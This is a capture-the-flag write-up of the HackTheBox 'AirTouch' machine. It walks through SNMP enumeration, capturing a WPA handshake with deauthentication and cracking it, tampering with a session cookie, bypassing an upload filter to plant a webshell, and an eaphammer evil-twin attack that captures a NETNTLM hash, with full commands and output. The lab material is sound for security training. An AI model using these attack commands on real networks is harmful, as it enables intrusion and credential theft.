See this write-up in Brazilian Portuguese here.

Introduction

Hello world!! Welcome to another step in my journey through the world of cybersecurity.

One of the first things a reckless youth does when installing Kali Linux for the first time is to try to hack the neighbors' wifi password. Go back in time a bit, to around 2013. Kali had just been released, but YouTube already had countless wifi hacking tutorials using BackTrack 5. I was one of those kids, and I lived in frustration because there were no neighbors with wifi where I lived.

Well, the world has changed since then, and we are here to perform wifi hacking on Hackthebox!

AirTouch is a machine designed to be difficult, but it was classified as Medium by the platform. We start by finding an open UDP port and, upon connecting to it, we obtain the default credentials for the user consultant. While searching this user's directory, we find a wifi network topology diagram showing that we were in an isolated network. However, consultant possessed the necessary wifi tools to perform handshake captures, which allowed us to connect to the non-corporate network, or the tablets network.

After finding session cookies in the .cap file captured in the previous attack, we gained access to the router's administrative panel. This allowed us to exploit a file upload vulnerability and gain direct access to system files. In one of these files, we obtained credentials to access the router remotely and gain root access to it. In its /root directory, we found the certificates required to perform an evil-twin attack, where we captured the NETNTLM hash and cracked it to obtain the corporate network password. We also found SSH credentials for the router. After gaining access to the new network, we found more exposed credentials in the hostapd files. Using these new credentials, we became admin and finally root.

Reconnaissance

Nmap

To begin, I ran a full port scan with Nmap.

PORT      STATE  SERVICE REASON         VERSION
22/tcp    open   ssh     syn-ack ttl 62 OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 bd:90:00:15:cf:4b:da:cb:c9:24:05:2b:01:ac:dc:3b (RSA)
|   256 6e:e2:44:70:3c:6b:00:57:16:66:2f:37:58:be:f5:c0 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBIFdougpfxwAEIWPEa46kK7yuwcialkBHhi6CR0aNOdjjNuPKkbc8GGATnt0vr5eEoc9lsYRRnBoyhoHZMd4oGw=
|   256 ad:d5:d5:f0:0b:af:b2:11:67:5b:07:5c:8e:85:76:76 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPp9qQHbtPkcaGbM4SnotIbktxIUaybHBXxDXKgyqYnK
10849/tcp closed unknown reset ttl 63
30677/tcp closed unknown reset ttl 63
43954/tcp closed unknown reset ttl 63
51778/tcp closed unknown reset ttl 63
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

The Nmap scan returned only port 22 open. In the context of Hackthebox, this is usually a hint to run a UDP scan, as previously seen in the machine Underpass. I then ran a UDP scan and found port 161 open.

PORT      STATE  SERVICE   REASON
161/udp   open   snmp      udp-response ttl 62

I connected to this port using the snmp-check tool and obtained some interesting information.

┌──(kali㉿kali)-[~/Boxes/Hackthebox/Medium/AirTouch]
└─$ snmp-check -c public -p 161 -v 1  $IP
snmp-check v1.9 - SNMP enumerator
Copyright (c) 2005-2015 by Matteo Cantoni (www.nothink.org)

[+] Try to connect to 10.129.36.242:161 using SNMPv1 and community 'public'
[*] System information:
  Host IP address               : 10.129.36.242
  Hostname                      : Consultant
  Description                   : "The default consultant password is: RxBlZhLmOkacNWScmZ6D (change it after use it)"
  Contact                       : admin@AirTouch.htb
  Location                      : "Consultant pc"
  Uptime snmp                   : 00:19:24.60
  Uptime system                 : 00:18:11.92
  System date                   : -

I discovered that the domain was airtouch.htb. I also obtained default credentials for the user consultant.

Initial Access

Shell as Consultant

Using the consultant credentials, I was able to connect via SSH.

┌──(kali㉿kali)-[~/Boxes/Hackthebox/Medium/AirTouch]
└─$ ssh consultant@AirTouch.htb
** WARNING: connection is not using a post-quantum key exchange algorithm.
** This session may be vulnerable to "store now, decrypt later" attacks.
** The server may need to be upgraded. See https://openssh.com/pq.html
consultant@airtouch.htb's password:
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-216-generic x86_64)

* Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro
This system has been minimized by removing packages and content that are
not required on a system that users do not log into.
To restore this content, you can run the 'unminimize' command.
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
consultant@AirTouch-Consultant:~$

In the consultant directory, there were two image files:

-rw-r--r-- 1 consultant consultant 131841 Mar 27  2024 diagram-net.png
-rw-r--r-- 1 consultant consultant 743523 Mar 27  2024 photo_2023-03-01_22-04-52.png

I downloaded the images to Kali using the scp command.

scp consultant@AirTouch.htb:/home/consultant/diagram-net.png ~/Downloads/
scp consultant@AirTouch.htb:/home/consultant/photo_2023-03-01_22-04-52.png ~/Downloads/

The images show the wifi network topology. There are three VLANs isolated from each other. The objective was quite clear. The prize would be in the corporate network.

Checking sudo permissions, I saw that the user consultant could become root.

consultant@AirTouch-Consultant:~$ sudo -l
Matching Defaults entries for consultant on AirTouch-Consultant:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User consultant may run the following commands on AirTouch-Consultant:
    (ALL) NOPASSWD: ALL
consultant@AirTouch-Consultant:~$ sudo su
root@AirTouch-Consultant:/home/consultant# id
uid=0(root) gid=0(root) groups=0(root)
root@AirTouch-Consultant:/home/consultant# whoami
root
root@AirTouch-Consultant:/home/consultant# cd
root@AirTouch-Consultant:~# ls
eaphammer

In the /root/eaphammer directory, there were some configuration files and wifi hacking tools. Additionally, there was a dictionary for brute-force attacks and other pentest tools. consultant was likely conducting a pentest on the infrastructure.

Wifi Hacking

Scanning for available wifi networks, I discovered there were others beyond those listed in the topology diagrams.

root@AirTouch-Consultant:~/eaphammer# ip link set wlan0 up
root@AirTouch-Consultant:~/eaphammer# iw dev wlan0 scan | grep SSID
	SSID: vodafoneFB6N
		 * Multiple BSSID
		 * SSID List
	SSID: MOVISTAR_FG68
		 * Multiple BSSID
		 * SSID List
	SSID: AirTouch-Internet
		 * Multiple BSSID
		 * SSID List
	SSID: WIFI-JOHN
		 * Multiple BSSID
		 * SSID List
	SSID: MiFibra-24-D4VY
		 * Multiple BSSID
		 * SSID List
	SSID: AirTouch-Office
		 * Multiple BSSID
		 * SSID List
	SSID: AirTouch-Office
		 * Multiple BSSID
		 * SSID List

Since the goal was to reach the corporate network, I tried using eaphammer to perform an evil-twin attack. However, it didn't work because I didn't have the correct network certificates. I then used aircrack-ng to capture the handshake and perform a dictionary attack to get the password for the tablets network, AirTouch-Internet.

I started by putting the network interface into monitor mode.

root@AirTouch-Consultant:~/eaphammer# airmon-ng start wlan0
Your kernel has module support but you don't have modprobe installed.
It is highly recommended to install modprobe (typically from kmod).
Your kernel has module support but you don't have modinfo installed.
It is highly recommended to install modinfo (typically from kmod).
Warning: driver detection without modinfo may yield inaccurate results.

PHY Interface Driver  Chipset
phy0 wlan0  mac80211_hwsim Software simulator of 802.11 radio(s) for mac80211
  (mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
  (mac80211 station mode vif disabled for [phy0]wlan0)
phy1 wlan1  mac80211_hwsim Software simulator of 802.11 radio(s) for mac80211
phy2 wlan2  mac80211_hwsim Software simulator of 802.11 radio(s) for mac80211
phy3 wlan3  mac80211_hwsim Software simulator of 802.11 radio(s) for mac80211
phy4 wlan4  mac80211_hwsim Software simulator of 802.11 radio(s) for mac80211
phy5 wlan5  mac80211_hwsim Software simulator of 802.11 radio(s) for mac80211
phy6 wlan6  mac80211_hwsim Software simulator of 802.11 radio(s) for mac80211

Then I used airodump-ng to find the BSSID for the AirTouch-Internet network.

root@AirTouch-Consultant:~/eaphammer# airodump-ng wlan0mon

CH  7 ][ Elapsed: 54 s ][ 2026-04-16 17:47
 BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID
 8A:80:85:A5:72:7A  -28       39        0    0   6   54        CCMP   PSK  WIFI-JOHN
 F0:9F:C2:A3:F1:A7  -28       39        2    0   6   54        CCMP   PSK  AirTouch-Internet
 CE:8C:7D:38:48:57  -28       40        0    0   9   54   WPA2 CCMP   PSK  MiFibra-24-D4VY
 22:A6:74:62:53:7E  -28       78        0    0   3   54        CCMP   PSK  MOVISTAR_FG68
 62:DB:1D:0D:3D:6E  -28      555        0    0   1   54        TKIP   PSK  vodafoneFB6N
 CH  3 ][ Elapsed: 1 min ][ 2026-04-16 17:48
 BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID
 8A:80:85:A5:72:7A  -28       77        0    0   6   54        CCMP   PSK  WIFI-JOHN
 F0:9F:C2:A3:F1:A7  -28       77        2    0   6   54        CCMP   PSK  AirTouch-Internet
 CE:8C:7D:38:48:57  -28       76        0    0   9   54   WPA2 CCMP   PSK  MiFibra-24-D4VY
 22:A6:74:62:53:7E  -28      153        0    0   3   54        CCMP   PSK  MOVISTAR_FG68
 62:DB:1D:0D:3D:6E  -28     1079        0    0   1   54        TKIP   PSK  vodafoneFB6N
 BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes
 F0:9F:C2:A3:F1:A7  28:6C:07:FE:A3:22  -29   54 -36      0        2
 (not associated)   C8:8A:9A:6F:F9:D2  -29    0 - 1      0        3         AccessLink,AirTouch-Office
 (not associated)   28:6C:07:12:EE:A1  -29    0 - 1      0        2         AirTouch-Office
 (not associated)   28:6C:07:12:EE:F3  -29    0 - 1      0        8         AirTouch-Office
Quitting...

After discovering the BSSID of the AirTouch-Internet network, I used airodump-ng to capture traffic on channel 6 and write it to a capture file with the prefix captura.

root@AirTouch-Consultant:~/eaphammer# airodump-ng -c 6 --bssid F0:9F:C2:A3:F1:A7 -w captura wlan0mon

In another terminal, I accessed the consultant account via SSH and used the aireplay-ng tool to deauthenticate the user and capture the handshake upon reconnection.

root@AirTouch-Consultant:~/eaphammer# aireplay-ng -0 5 -a F0:9F:C2:A3:F1:A7 -c 28:6C:07:FE:A3:22 wlan0mon
17:57:02  Waiting for beacon frame (BSSID: F0:9F:C2:A3:F1:A7) on channel 6
17:57:02  Sending 64 directed DeAuth (code 7). STMAC: [28:6C:07:FE:A3:22] [ 0| 0 ACKs]
17:57:03  Sending 64 directed DeAuth (code 7). STMAC: [28:6C:07:FE:A3:22] [ 0| 0 ACKs]
17:57:03  Sending 64 directed DeAuth (code 7). STMAC: [28:6C:07:FE:A3:22] [ 0| 0 ACKs]
17:57:04  Sending 64 directed DeAuth (code 7). STMAC: [28:6C:07:FE:A3:22] [ 0| 0 ACKs]
17:57:04  Sending 64 directed DeAuth (code 7). STMAC: [28:6C:07:FE:A3:22] [ 0| 0 ACKs]

Next, I successfully captured the handshake.

17:51:10  Created capture file "captura-02.cap".

CH  6 ][ Elapsed: 7 mins ][ 2026-04-16 17:58 ][ WPA handshake: F0:9F:C2:A3:F1:A7
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID
 F0:9F:C2:A3:F1:A7  -28 100     4382      178    0   6   54        CCMP   PSK  AirTouch-Internet
 BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes
 F0:9F:C2:A3:F1:A7  28:6C:07:FE:A3:22  -29   48 -48      0      825  EAPOL  AirTouch-Internet
Quitting...

Conveniently, the rockyou.txt dictionary was available in the wordlists/ directory.

root@AirTouch-Consultant:~/eaphammer# ls wordlists/
example_known_ssids_file.txt  rockyou.txt  rockyou.txt.tar.gz

Thus, I obtained the wifi password with the aircrack-ng tool.

root@AirTouch-Consultant:~/eaphammer# aircrack-ng -w wordlists/rockyou.txt captura-02.cap
Reading packets, please wait...
Opening captura-02.cap
Read 1498 packets.

#  BSSID              ESSID                     Encryption
   1  F0:9F:C2:A3:F1:A7  AirTouch-Internet         WPA (1 handshake)
Choosing first network as target.
Reading packets, please wait...
Opening captura-02.cap
Read 1498 packets.
1 potential targets
                               Aircrack-ng 1.6
      [00:00:08] 21592/14344391 keys tested (2805.71 k/s)
      Time left: 1 hour, 25 minutes, 6 seconds                   0.15%
                           KEY FOUND! [ challenge ]

      Master Key     : D1 FF 70 2D CB 11 82 EE C9 E1 89 E1 69 35 55 A0
                       07 DC 1B 21 BE 35 8E 02 B8 75 74 49 7D CF 01 7E
      Transient Key  : EB A2 7F 17 B1 DE 01 3E 40 68 57 00 10 94 14 81
                       C9 61 BB E8 B1 08 18 CC F8 86 A8 99 82 4D 79 F0
                       F2 37 85 A2 3C F9 CE 5B 95 DC 98 78 95 58 AF 8D
                       01 03 B4 EA ED CD 0A 81 FB 45 10 5B 17 BE E3 1E
      EAPOL HMAC     : B0 B7 B6 6E 74 F2 6A 3B 6C 9B E2 CD 85 84 51 AC

The AirTouch-Internet network password was: challenge.

To connect, I needed to disable monitor mode.

root@AirTouch-Consultant:~/eaphammer# airmon-ng stop wlan0mon
Your kernel has module support but you don't have modprobe installed.
It is highly recommended to install modprobe (typically from kmod).
Your kernel has module support but you don't have modinfo installed.
It is highly recommended to install modinfo (typically from kmod).
Warning: driver detection without modinfo may yield inaccurate results.

PHY Interface Driver  Chipset
phy0 wlan0mon mac80211_hwsim Software simulator of 802.11 radio(s) for mac80211
  (mac80211 station mode vif enabled on [phy0]wlan0)
  (mac80211 monitor mode vif disabled for [phy0]wlan0mon)
phy1 wlan1  mac80211_hwsim Software simulator of 802.11 radio(s) for mac80211
phy2 wlan2  mac80211_hwsim Software simulator of 802.11 radio(s) for mac80211
phy3 wlan3  mac80211_hwsim Software simulator of 802.11 radio(s) for mac80211
phy4 wlan4  mac80211_hwsim Software simulator of 802.11 radio(s) for mac80211
phy5 wlan5  mac80211_hwsim Software simulator of 802.11 radio(s) for mac80211
phy6 wlan6  mac80211_hwsim Software simulator of 802.11 radio(s) for mac80211

And then configure wpa_supplicant.

root@AirTouch-Consultant:~/eaphammer# wpa_passphrase "AirTouch-Internet" "challenge" > wpa.conf
root@AirTouch-Consultant:~/eaphammer# wpa_supplicant -B -i wlan0 -c wpa.conf
Successfully initialized wpa_supplicant
rfkill: Cannot open RFKILL control device
rfkill: Cannot get wiphy information
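As an added example (my own code, not from the write-up or from any of the tools it uses), here is the derivation behind that result: WPA2-Personal turns the passphrase and SSID into the 256-bit PMK with PBKDF2-HMAC-SHA1 at 4096 iterations, which is what wpa_passphrase writes as psk= and what aircrack-ng printed above as Master Key. The block recomputes it for the values on this page and rebuilds the network block that wpa_passphrase wrote to wpa.conf.

```python
import hashlib
import hmac

# Values taken from the write-up: the SSID, the recovered passphrase and the
# "Master Key" aircrack-ng printed next to KEY FOUND.
SSID = "AirTouch-Internet"
PASSPHRASE = "challenge"
AIRCRACK_MASTER_KEY = (
    "d1ff702dcb1182eec9e189e1693555a0"
    "07dc1b21be358e02b87574497dcf017e"
)


def wpa_pmk(passphrase: str, ssid: str) -> bytes:
    """Derive the WPA/WPA2-Personal PMK as specified in IEEE 802.11i:
    PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 iterations, 256 bits)."""
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("WPA passphrase must be 8-63 ASCII characters")
    return hashlib.pbkdf2_hmac(
        "sha1", passphrase.encode("ascii"), ssid.encode("utf-8"), 4096, 32
    )


def pmk_matches(passphrase: str, ssid: str, master_key_hex: str) -> bool:
    """True if the passphrase reproduces the PMK that a cracker reported.
    Constant-time compare so the check itself leaks nothing about the key."""
    return hmac.compare_digest(wpa_pmk(passphrase, ssid), bytes.fromhex(master_key_hex))


def wpa_passphrase_block(ssid: str, passphrase: str) -> str:
    """Rebuild the network block that `wpa_passphrase SSID PASS` prints:
    the SSID, the passphrase as a commented #psk line, and the 64-hex psk=.
    The hex psk is the PMK itself, so wpa.conf is as sensitive as the passphrase."""
    return "\n".join(
        [
            "network={",
            f'\tssid="{ssid}"',
            f'\t#psk="{passphrase}"',
            f"\tpsk={wpa_pmk(passphrase, ssid).hex()}",
            "}",
        ]
    )


if __name__ == "__main__":
    print("PMK reproduces aircrack's Master Key:", pmk_matches(PASSPHRASE, SSID, AIRCRACK_MASTER_KEY))
    print(wpa_passphrase_block(SSID, PASSPHRASE))
```

The 4096 iterations are cheap enough (aircrack-ng reported about 2800 keys per second on this box) that a dictionary word falls in seconds; only a long random passphrase, or moving the network to WPA3-SAE, removes the offline attack.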

And then obtain an IP address via dhclient.

root@AirTouch-Consultant:~/eaphammer# dhclient wlan0
root@AirTouch-Consultant:~/eaphammer# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
2: eth0@if29: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
    link/ether ea:d5:33:69:fd:ea brd ff:ff:ff:ff:ff:ff link-netnsid 0
    inet 172.20.1.2/24 brd 172.20.1.255 scope global eth0
       valid_lft forever preferred_lft forever
4: wlan0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 42:00:00:00:00:00 brd ff:ff:ff:ff:ff:ff
    inet 192.168.3.48/24 brd 192.168.3.255 scope global dynamic wlan0
       valid_lft 86393sec preferred_lft 86393sec
    inet6 fe80::4000:ff:fe00:0/64 scope link
       valid_lft forever preferred_lft forever
8: wlan1: <BROADCAST,MULTICAST> mtu 1500 qdisc noop state DOWN group default qlen 1000
    link/ether 02:00:00:00:01:00 brd ff:ff:ff:ff:ff:ff
9: wlan2: <BROADCAST,MULTICAST> mtu 1500 qdisc noop state DOWN group default qlen 1000
    link/ether 02:00:00:00:02:00 brd ff:ff:ff:ff:ff:ff
10: wlan3: <BROADCAST,MULTICAST> mtu 1500 qdisc noop state DOWN group default qlen 1000
    link/ether 02:00:00:00:03:00 brd ff:ff:ff:ff:ff:ff
11: wlan4: <BROADCAST,MULTICAST> mtu 1500 qdisc noop state DOWN group default qlen 1000
    link/ether 02:00:00:00:04:00 brd ff:ff:ff:ff:ff:ff
12: wlan5: <BROADCAST,MULTICAST> mtu 1500 qdisc noop state DOWN group default qlen 1000
    link/ether 02:00:00:00:05:00 brd ff:ff:ff:ff:ff:ff
13: wlan6: <BROADCAST,MULTICAST> mtu 1500 qdisc noop state DOWN group default qlen 1000
    link/ether 02:00:00:00:06:00 brd ff:ff:ff:ff:ff:ff

Shell as user

I received the IP 192.168.3.48, indicating I was connected to the tablets network according to the diagram obtained earlier. Fortunately, there is Nmap on the consultant's laptop, so I ran a port scan on the entire network.

root@AirTouch-Consultant:~/eaphammer# nmap -Pn -F 192.168.3.0/24
Starting Nmap 7.80 ( https://nmap.org ) at 2026-04-16 18:24 UTC
Nmap scan report for 192.168.3.1
Host is up (0.000019s latency).
Not shown: 97 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
53/tcp open  domain
80/tcp open  http
MAC Address: F0:9F:C2:A3:F1:A7 (Ubiquiti Networks)

Nmap scan report for 192.168.3.48
Host is up (0.0000050s latency).
Not shown: 99 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
Nmap done: 256 IP addresses (2 hosts up) scanned in 26.20 seconds

Port 80 HTTP of the gateway was open. I set up port forwarding to access it from my browser. Upon visiting the page, I found a login page.


However, I lacked credentials, and default Ubiquiti credentials such as ubnt : ubnt or ui : ui did not work. The only information I had was the .cap file from airodump-ng. To analyze it in Wireshark, I used the password challenge to decrypt the WPA traffic; this only works because the capture also contains the client's four-way handshake, which Wireshark needs to derive that client's session keys.

✏️ Decrypting in Wireshark: In Wireshark, click Edit --> Preferences --> Protocols --> IEEE 802.11 --> Decryption Keys. For the key type choose wpa-pwd and as the key enter challenge:AirTouch-Internet (the format is passphrase:SSID).


While analyzing the HTTP requests, I found session cookies.


Next, I edited my cookies on the login page to access the dashboard.


But I couldn't perform any actions. Paying closer attention to the welcome message, I was the user user. I didn't have admin privileges. So, I edited the Role from user to admin.


This gave me access to the upload button. There was a restriction for php and html files. However, this could be easily bypassed with .php00% or .phtml extensions.


Thus, I successfully uploaded a simple webshell.


There were some files in the current directory, one of them being login.php. In this file, I found hardcoded credentials.


There was also a user user in /home/user.

Testing the admin password with the user user via SSH, I managed to access the gateway.

root@AirTouch-Consultant:~/eaphammer# ssh user@192.168.3.1
The authenticity of host '192.168.3.1 (192.168.3.1)' can't be established.
ECDSA key fingerprint is SHA256:++nw1pytCTTnPb2ngccd1CzlYaYUoTF8GmQ3a3QHnaU.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.3.1' (ECDSA) to the list of known hosts.
user@192.168.3.1's password:
Permission denied, please try again.
user@192.168.3.1's password:
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-216-generic x86_64)

* Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro
This system has been minimized by removing packages and content that are
not required on a system that users do not log into.
To restore this content, you can run the 'unminimize' command.
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
user@AirTouch-AP-PSK:~$

Privilege Escalation

Shell as remote

Just like consultant, this user could also become root using the sudo -i command.

user@AirTouch-AP-PSK:~$ sudo -l
Matching Defaults entries for user on AirTouch-AP-PSK:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User user may run the following commands on AirTouch-AP-PSK:
    (ALL) NOPASSWD: ALL

After becoming root, I listed the files in the /root directory. I took the opportunity to grab the user flag located there.

root@AirTouch-AP-PSK:~# ls -la
total 44
drwx------ 1 root root 4096 Apr 16 22:35 .
drwxr-xr-x 1 root root 4096 Apr 16 22:35 ..
lrwxrwxrwx 1 root root    9 Nov 24  2024 .bash_history -> /dev/null
-rw-r--r-- 1 root root 3106 Dec  5  2019 .bashrc
-rw-r--r-- 1 root root  161 Dec  5  2019 .profile
drwxr-xr-x 2 root root 4096 Mar 27  2024 certs-backup
-rwxr-xr-x 1 root root    0 Mar 27  2024 cronAPs.sh
drwxr-xr-x 1 root root 4096 Apr 16 22:35 psk
-rw-r--r-- 1 root root  364 Nov 24  2024 send_certs.sh
-rwxr-xr-x 1 root root 1963 Mar 27  2024 start.sh
-rw-r----- 1 root 1001   33 Apr 16 22:35 user.txt
-rw-r--r-- 1 root root  319 Mar 27  2024 wlan_config_aps
root@AirTouch-AP-PSK:~# cat user.txt
f724d9df5a284a6d751b3816ff0c9e34

Among the files, there was also one called send_certs.sh. It contained more hardcoded credentials.

root@AirTouch-AP-PSK:~# cat send_certs.sh
#!/bin/bash

# DO NOT COPY
# Script to sync certs-backup folder to AirTouch-office.
# Define variables
REMOTE_USER="remote"
REMOTE_PASSWORD="xGgWEwqUpfoOVsLeROeG"
REMOTE_PATH="~/certs-backup/"
LOCAL_FOLDER="/root/certs-backup/"
# Use sshpass to send the folder via SCP
sshpass -p "$REMOTE_PASSWORD" scp -r "$LOCAL_FOLDER" "$REMOTE_USER@10.10.10.1:$REMOTE_PATH"

Here was the winning ticket to reach the corporate network! However, I was still on a separate VLAN.

In the same file, the variable LOCAL_FOLDER="/root/certs-backup/" indicated that the certificates were copied from this directory and sent, as the remote user, to ~/certs-backup/ on the corporate network gateway at 10.10.10.1.

I used the scp command to copy this directory to the consultant user's laptop. Then, I imported the correct certificates into the eaphammer tool.

./eaphammer --cert-wizard import --ca-cert certs-backup/ca.crt --server-cert certs-backup/server.crt --private-key certs-backup/server.key

Running iw dev wlan0 scan again, I obtained more information about the AirTouch-Office network, for instance its BSSID and its channel, 44.

I then activated monitor mode and ran airodump-ng on channel 44 to capture the MAC addresses of the connected clients.

root@AirTouch-Consultant:~/eaphammer# airodump-ng --channel 44 wlan0mon

CH 44 ][ Elapsed: 18 s ][ 2026-04-17 21:54 ][ WPA handshake: AC:8B:A9:AA:3F:D2
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID
 AC:8B:A9:F3:A1:13  -28 100      202        0    0  44   54e  WPA2 CCMP   MGT  AirTouch-Office
 AC:8B:A9:AA:3F:D2  -28 100      202       50    0  44   54e  WPA2 CCMP   MGT  AirTouch-Office
 BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes
 AC:8B:A9:AA:3F:D2  C8:8A:9A:6F:F9:D2  -29    0 -12e     0        1
 AC:8B:A9:AA:3F:D2  28:6C:07:12:EE:A1  -29    6e-36e     0       37  PMKID  AirTouch-Office
 AC:8B:A9:AA:3F:D2  28:6C:07:12:EE:F3  -29    6e-54e     0       35  PMKID  AirTouch-Office
Quitting...

Then I ran eaphammer and, in another terminal, used aireplay-ng again to deauthenticate clients and capture the NETNTLM hash.

root@AirTouch-Consultant:~/eaphammer# ./eaphammer --bssid AC:8B:A9:AA:3F:D2 --essid AirTouch-Office --channel 44 --interface wlan0 --auth wpa-eap --creds --capture-wpa-handshakes yes

.__
  ____ _____  ______ |  |__ _____    _____   _____   ___________
_/ __ \\__  \ \____ \|  |  \\__  \  /     \ /     \_/ __ \_  __ \
\  ___/ / __ \|  |_> >   Y  \/ __ \|  Y Y  \  Y Y  \  ___/|  | \/
 \___  >____  /   __/|___|  (____  /__|_|  /__|_|  /\___  >__|
     \/     \/|__|        \/     \/      \/      \/     \/

                        Now with more fast travel than a next-gen Bethesda game. >:D
                             Version:  1.14.0
                            Codename:  Final Frontier
                              Author:  @s0lst1c3
                             Contact:  gabriel<<at>>transmitengage.com

[?] Am I root?
[*] Checking for rootness...
[*] I AM ROOOOOOOOOOOOT
[*] Root privs confirmed! 8D
[*] Saving current iptables configuration...
[*] Reticulating radio frequency splines...
Error: Could not create NMClient object: Could not connect: No such file or directory.
[*] Using nmcli to tell NetworkManager not to manage wlan0...
100%|███████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 1/1 [00:01<00:00,  1.00s/it]
[*] Success: wlan0 no longer controlled by NetworkManager.
[!] The hw_mode specified in hostapd.ini is invalid for the selected channel (g, 44)
[!] Falling back to hw_mode: a
[*] WPA handshakes will be saved to /root/eaphammer/loot/wpa_handshake_capture-2026-04-17-21-55-48-BqO4G0thMviUzENDTRFwkomzFYmPShnb.hccapx
[hostapd] AP starting...
Configuration file: /root/eaphammer/tmp/hostapd-2026-04-17-21-55-48-TBJ93ggGPKNwZcudnqxzxjNMHrLyeCYP.conf
rfkill: Cannot open RFKILL control device
wlan0: interface state UNINITIALIZED->COUNTRY_UPDATE
Using interface wlan0 with hwaddr ac:8b:a9:aa:3f:d2 and ssid "AirTouch-Office"
wlan0: interface state COUNTRY_UPDATE->ENABLED
wlan0: AP-ENABLED

Press enter to quit...
wlan0: STA 28:6c:07:12:ee:a1 IEEE 802.11: authenticated
wlan0: STA c8:8a:9a:6f:f9:d2 IEEE 802.11: authenticated
wlan0: STA c8:8a:9a:6f:f9:d2 IEEE 802.11: associated (aid 1)
wlan0: CTRL-EVENT-EAP-STARTED c8:8a:9a:6f:f9:d2
wlan0: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=1
wlan0: CTRL-EVENT-EAP-RETRANSMIT c8:8a:9a:6f:f9:d2
wlan0: CTRL-EVENT-EAP-RETRANSMIT c8:8a:9a:6f:f9:d2
wlan0: STA 28:6c:07:12:ee:f3 IEEE 802.11: authenticated
wlan0: STA 28:6c:07:12:ee:a1 IEEE 802.11: authenticated
wlan0: STA 28:6c:07:12:ee:f3 IEEE 802.11: authenticated
wlan0: STA 28:6c:07:12:ee:f3 IEEE 802.11: associated (aid 2)
wlan0: CTRL-EVENT-EAP-STARTED 28:6c:07:12:ee:f3
wlan0: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=1
wlan0: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=25

mschapv2: Fri Apr 17 21:56:19 2026
  domain\username:  AirTouch\r4ulcl
  username:   r4ulcl
  challenge:   19:71:d4:0a:55:10:57:e9
  response:   3a:a4:d1:1f:f1:26:fc:c4:0d:80:97:46:a0:07:ce:23:63:8f:6f:fd:42:40:3b:0e

  jtr NETNTLM:   r4ulcl:$NETNTLM$1971d40a551057e9$3aa4d11ff126fcc40d809746a007ce23638f6ffd42403b0e
  hashcat NETNTLM:  r4ulcl::::3aa4d11ff126fcc40d809746a007ce23638f6ffd42403b0e:1971d40a551057e9

wlan0: CTRL-EVENT-EAP-FAILURE 28:6c:07:12:ee:f3
wlan0: STA 28:6c:07:12:ee:f3 IEEE 802.1X: authentication failed - EAP type: 0 (unknown)
wlan0: STA 28:6c:07:12:ee:f3 IEEE 802.1X: Supplicant used different EAP type: 25 (PEAP)
wlan0: CTRL-EVENT-EAP-RETRANSMIT c8:8a:9a:6f:f9:d2
wlan0: STA 28:6c:07:12:ee:f3 IEEE 802.11: deauthenticated due to local deauth request
wlan0: STA 28:6c:07:12:ee:f3 IEEE 802.11: authenticated
[hostapd] Terminating event loop...
[hostapd] Event loop terminated.
[hostapd] Hostapd worker still running... waiting for it to join.
wlan0: interface state ENABLED->DISABLED
wlan0: AP-DISABLED
wlan0: CTRL-EVENT-TERMINATING
nl80211: deinit ifname=wlan0 disabled_11b_rates=0
[hostapd] Worker joined.
[hostapd] AP disabled.
Error: Could not create NMClient object: Could not connect: No such file or directory.
[*] Using nmcli to give NetworkManager control of wlan0...
100%|███████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 1/1 [00:01<00:00,  1.00s/it]
[*] Success: wlan0 is now managed by NetworkManager.

Next, I cracked the hash with john.

